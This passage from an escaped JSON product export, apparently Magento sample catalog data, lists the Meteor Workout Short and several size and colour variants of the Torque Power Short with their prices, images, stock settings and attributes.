product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Meteor Workout Short\",\"description\":\"<p>Step into the Meteor Workout Short for an incredibly lightweight fitness experience. Its breathable construction and an inner brief provide additional comfort and support, while the adjustable waistband offers the perfect fit to take you to the finish.<\\/p>\\n<p>&bull; Royal blue shorts with light blue accents.<br \\/>&bull; Interior drawstring waistband. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer,material=Cocona&reg; performance fabric|Polyester,pattern=Solid,climate=All-weather|Spring|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MSH03-32-Black,size=32,color=Black|sku=MSH03-32-Blue,size=32,color=Blue|sku=MSH03-32-Green,size=32,color=Green|sku=MSH03-33-Black,size=33,color=Black|sku=MSH03-33-Blue,size=33,color=Blue|sku=MSH03-33-Green,size=33,color=Green|sku=MSH03-34-Black,size=34,color=Black|sku=MSH03-34-Blue,size=34,color=Blue|sku=MSH03-34-Green,size=34,color=Green|sku=MSH03-36-Black,size=36,color=Black|sku=MSH03-36-Blue,size=36,color=Blue|sku=MSH03-36-Green,size=36,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh03-blue_alt1.jpg,\\/m\\/s\\/msh03-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh03-blue_alt1.jpg,\\/m\\/s\\/msh03-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Base Layer\",\"material\":\"Cocona&reg; performance fabric|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Spring|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"865\":{\"sku\":\"MSH04-32-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Torque Power Short-32-Gray\",\"description\":\"<p>Take a turn in the Torque Power Short and enjoy the smooth, motion-friendly stretch and sweat-wicking, UV-protective material. You\'ll stay cool, dry and energized miles later.<\\/p>\\n<p>&bull; Light gray shorts.<br \\/>&bull; Fitted design. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Flat-seam construction. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"torque-power-short-32-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh04-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh04-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Gray\"},\"866\":{\"sku\":\"MSH04-32-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Torque Power Short-32-Purple\",\"description\":\"<p>Take a turn in the Torque Power Short and enjoy the smooth, motion-friendly stretch and sweat-wicking, UV-protective material. You\'ll stay cool, dry and energized miles later.<\\/p>\\n<p>&bull; Light gray shorts.<br \\/>&bull; Fitted design. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Flat-seam construction. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"torque-power-short-32-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Purple\"},\"867\":{\"sku\":\"MSH04-32-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Torque Power Short-32-Yellow\",\"description\":\"<p>Take a turn in the Torque Power Short and enjoy the smooth, motion-friendly stretch and sweat-wicking, UV-protective material. You\'ll stay cool, dry and energized miles later.<\\/p>\\n<p>&bull; Light gray shorts.<br \\/>&bull; Fitted design. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Flat-seam construction. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"torque-power-short-32-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Yellow\"},\"868\":{\"sku\":\"MSH04-33-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Torque Power Short-33-Gray\",\"description\":\"<p>Take a turn in the Torque Power Short and enjoy the smooth, motion-friendly stretch and sweat-wicking, UV-protective material. You\'ll stay cool, dry and energized miles later.<\\/p>\\n<p>&bull; Light gray shorts.<br \\/>&bull; Fitted design. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Flat-seam construction. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"torque-power-short-33-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh04-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh04-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Gray\"},\"869\":{\"sku\":\"MSH04-33-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Torque Power Short-33-Purple\",\"description\":\"<p>Take a turn in the Torque Power Short and enjoy the smooth, motion-friendly stretch and sweat-wicking, UV-protective material. You\'ll stay cool, dry and energized miles later.<\\/p>\\n<p>&bull; Light gray shorts.<br \\/>&bull; Fitted design. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Flat-seam construction. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"torque-power-short-33-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Purple\"},\"870\":{\"sku\":\"MSH04-33-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Torque Power Short-33-Yellow\",\"description\":\"<p>Take a turn in the Torque Power Short and enjoy the smooth, motion-friendly stretch and sweat-wicking, UV-protective material. You\'ll stay cool, dry and energized miles later.<\\/p>\\n<p>&bull; Light gray shorts.<br \\/>&bull; Fitted design. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Flat-seam construction. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"torque-power-short-33-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Yellow\"},\"871\":{\"sku\":\"MSH04-34-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Torque Power Short-34-Gray\",\"description\":\"<p>Take a turn in the Torque Power Short and enjoy the smooth, motion-friendly stretch and sweat-wicking, UV-protective material. You\'ll stay cool, dry and energized miles later.<\\/p>\\n<p>&bull; Light gray shorts.<br \\/>&bull; Fitted design. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Flat-seam construction. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"torque-power-short-34-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh04-gray_back.jpg\",\"image\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh04-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh04-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Gray\"},\"872\":{\"sku\":\"MSH04-34-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Torque Power Short-34-Purple\",\"description\":\"<p>Take a turn in the Torque Power Short and enjoy the smooth, motion-friendly stretch and sweat-wicking, UV-protective material. You\'ll stay cool, dry and energized miles later.<\\/p>\\n<p>&bull; Light gray shorts.<br \\/>&bull; Fitted design. <br \\/>&bull; Elastic waistband. <br \\/>&bull; Flat-seam construction. <br \\/>&bull; 7\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32.5\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"torque-power-short-34-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\